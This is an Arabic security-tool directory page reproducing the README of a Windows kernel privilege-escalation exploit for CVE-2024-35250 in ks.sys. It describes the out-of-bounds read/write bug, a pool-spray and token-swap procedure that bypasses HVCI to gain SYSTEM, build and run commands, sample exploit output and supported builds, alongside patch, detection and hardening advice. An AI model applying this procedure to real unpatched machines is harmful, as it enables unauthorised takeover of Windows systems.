Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
HVCIPwned — تُظهر CVE-2024-35250 أن HVCI ليس دفاعًا ضد استغلالات النواة القائمة على البيانات فقط. ما دامت ثغرة في برنامج تشغيل توفّر أولية قراءة/كتابة اعتباطية (R/W)، يظل تبديل الرمز المميّز (token swap) تقنيةً عامةً لتصعيد الصلاحيات إلى SYSTEM — دون الحاجة إلى تنفيذ أي كود. | Kitploit
أدوات/GitHubGitHub/xvalegendary/hvcipwned
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHubxvalegendary/hvcipwned

HVCIPwned

تُظهر CVE-2024-35250 أن HVCI ليس دفاعًا ضد استغلالات النواة القائمة على البيانات فقط. ما دامت ثغرة في برنامج تشغيل توفّر أولية قراءة/كتابة اعتباطية (R/W)، يظل تبديل الرمز المميّز (token swap) تقنيةً عامةً لتصعيد الصلاحيات إلى SYSTEM — دون الحاجة إلى تنفيذ أي كود.

عرض المستودع
82منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-35250

تصعيد صلاحيات محلي عبر إلغاء مرجع مؤشر غير موثوق في برنامج تشغيل Kernel Streaming الخاص بنظام Windows (ks.sys). استغلال يعتمد على البيانات فقط — يتجاوز حماية تكامل الكود المحمية بواسطة Hypervisor (HVCI).

الملخص

الحقلالتفاصيل
CVECVE-2024-35250
المكوّنks.sys (Kernel Streaming)
نوع الخللإلغاء مرجع مؤشر غير موثوق
التأثيرتصعيد صلاحيات إلى NT AUTHORITY\SYSTEM
HVCIتم تجاوزه — بدون تنفيذ كود في النواة
التصحيحKB5039212 (يونيو 2024)
الأهدافWindows 10 20H1+ / Windows 11 21H2-23H2

الثغرة

يقوم ks!KspPropertyHandler بتوجيه طلبات الخصائص على مستوى الطبولوجيا عبر KspProcessPropertyNode. يتم استخدام حقل NodeId القادم من بنية KSP_NODE التي يوفّرها المستخدم كمؤشر إلى مصفوفة جدول الأتمتة الداخلية بدون التحقق من الحدود:

root@kitploit:~
NtDeviceIoControlFile
  ks!CKSFilter::DispatchDeviceIoControl
    ks!KspPropertyHandler
      ks!KspProcessPropertyNode
        *(automationTable + NodeId * stride)   <-- يتحكم به المهاجم

إن NodeId مصمّم بعناية يتجاوز عدد العقد الفعلي يعيد توجيه إلغاء المرجع إلى ذاكرة مجاورة من تجمّع الذاكرة (pool memory)، مما يوفّر بدائية قراءة/كتابة خارج الحدود.

تجاوز HVCI

يعالج الاستغلال بنى بيانات النواة حصريًا:

  1. تسريب عنوان EPROCESS عبر NtQuerySystemInformation
  2. تشغيل الثغرة لبناء قراءة/كتابة عشوائية في النواة
  3. اجتياز ActiveProcessLinks للعثور على PID 4 (System)
  4. استبدال رمز العملية الحالية برمز System
  5. فتح شل بصلاحيات مرتفعة

لا يتم حقن أي شيلكود. لا يتم إنشاء أو تنفيذ أي صفحات كود غير موقّعة. لا يتم اختطاف أي مؤشرات تدفق تحكم.

الحمايةالحالة
HVCI / KMCIتم تجاوزها
SMEPلم يتم تشغيلها
SMAPلم يتم تشغيلها
kCFGلم يتم تشغيلها

البناء

المتطلبات

  • Visual Studio 2019 / 2022
  • Windows SDK 10.0.19041.0+

الترجمة (Compile)

  1. افتح hvcipwned.sln في Visual Studio
  2. اختر Release | x64
  3. Build ← Build Solution (Ctrl+Shift+B)

الملف الناتج: x64\Release\hvcipwned.exe

البناء اليدوي باستخدام cl.exe

root@kitploit:~
cl.exe /nologo /W4 /O2 /TC ^
    main.c device.c leak.c krw.c token.c exploit.c ^
    /I ^
    /Fe:exploit.exe ^
    /link setupapi.lib kernel32.lib advapi32.lib

الاستخدام

root@kitploit:~
hvcipwned.exe

شغّله من جلسة مستخدم غير مميز على نظام ثغره غير مصحّح. عند النجاح، تفتح نافذة cmd.exe جديدة تعمل بصلاحيات NT AUTHORITY\SYSTEM.

المخرجات المتوقعة

root@kitploit:~
[+] cve-2024-35250 exploit
[+] ks.sys untrusted pointer dereference -> eop
[~] hvci bypass via data-only attack
[+] os: 10.0.19045
[+] offsets: pid=0x440 links=0x448 token=0x4b8
[+] device: \\?\hdaudio#func_01&ven_10ec...
[+] device handle: 0x00000000000000f4
[~] calibrating r/w primitive...
[+] kernel base: 0xfffff80140000000
[~] spraying named pipes for pool layout...
[+] sprayed 5000 pipe pairs
[~] poking hole at index 2500...
[~] scanning for kernel pointer via oob read...
[+] found kernel ptr at node 3 offset 2: 0xffffa70500000000
[+] pipe object kernel addr: 0xffffa70500000000
[+] r/w primitive initialized (mode 1)
[+] current eprocess: 0xffffa705d90f4080
[+] kernel read pid: 1234 (expected: 1234)
[+] system eprocess: 0xffffa70500004080
[+] system token: 0xffffa70512345673
[+] token after swap: 0xffffa70512345670
[+] token swap successful
[+] escalation complete
[+] elevated shell spawned (pid: 5678)

press enter to exit...

هيكل المشروع

root@kitploit:~
hvcipwned/
├── hvcipwned.sln
├── hvcipwned.vcxproj
├── hvcipwned.vcxproj.filters
├── README.md
├── LICENSE
├── .gitignore
├── common.h         - types, log macros, nt api typedefs
├── offsets.h        - per-build eprocess field offsets
├── device.h         - ks device enumeration
├── leak.h           - kernel address leaks
├── krw.h            - r/w primitive context
├── token.h          - token swap + shell spawn
└── exploit.h        - top-level entry
├── main.c           - entry point
├── device.c         - setupapi device open
├── leak.c           - NtQuerySystemInformation leaks
├── krw.c            - vulnerability trigger + pool spray + r/w
├── token.c          - eprocess walk + token overwrite
└── exploit.c        - orchestration

الإصدارات المدعومة

يتم حل الإزاحات (offsets) تلقائيًا في وقت التشغيل عبر RtlGetVersion.

ملاحظات

  • يتطلب جهاز تصفية KS مع عقد طبولوجيا (تعمل أجهزة الصوت)
  • يعتمد نجاح رشّ التجمّع (pool spray) على ضغط ذاكرة النظام والتوقيت
  • يستخدم الاستغلال خصائص الأنابيب المسماة (named pipes) لتهيئة توزيع التجمّع (pool feng shui)
  • شغّله كمستخدم عادي (غير مسؤول) لإظهار تصعيد الصلاحيات
  • قد يتطلب محاولات متعددة بسبب عشوائية تخطيط التجمّع

التخفيف

المراجع

  • استشارة Microsoft
  • ملاحظات تصحيح KB5039212
  • DEVCORE — Pwn2Own Vancouver 2024
  • varwara/CVE-2024-35250

إخلاء مسؤولية

هذا المشروع مقدَّم لأغراض البحث الأمني المعتمد والتعليم فقط. لا تستخدمه ضد أي أنظمة دون إذن كتابي صريح. لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

الترخيص

MIT

تنزيل الأداة
CET / Shadow Stackلم يتم تشغيلها
نظام التشغيلالإصدار (Build)الحالة
Windows 10 20H119041مدعوم
Windows 10 20H219042مدعوم
Windows 10 21H119043مدعوم
Windows 10 21H219044مدعوم
Windows 10 22H219045مدعوم
Windows 11 21H222000مدعوم
Windows 11 22H222621مدعوم
Windows 11 23H222631مدعوم
الإجراءالتفاصيل
التصحيحثبّت KB5039212 (يونيو 2024) أو أحدث
الكشفراقب IOCTL_KS_PROPERTY مع علامة KSPROPERTY_TYPE_TOPOLOGY
EDRنبّه عند تغييرات تكامل الرموز عبر استدعاءات EtwTi في النواة
التقويةقيّد وصول المستخدم إلى واجهات أجهزة KS عبر DACL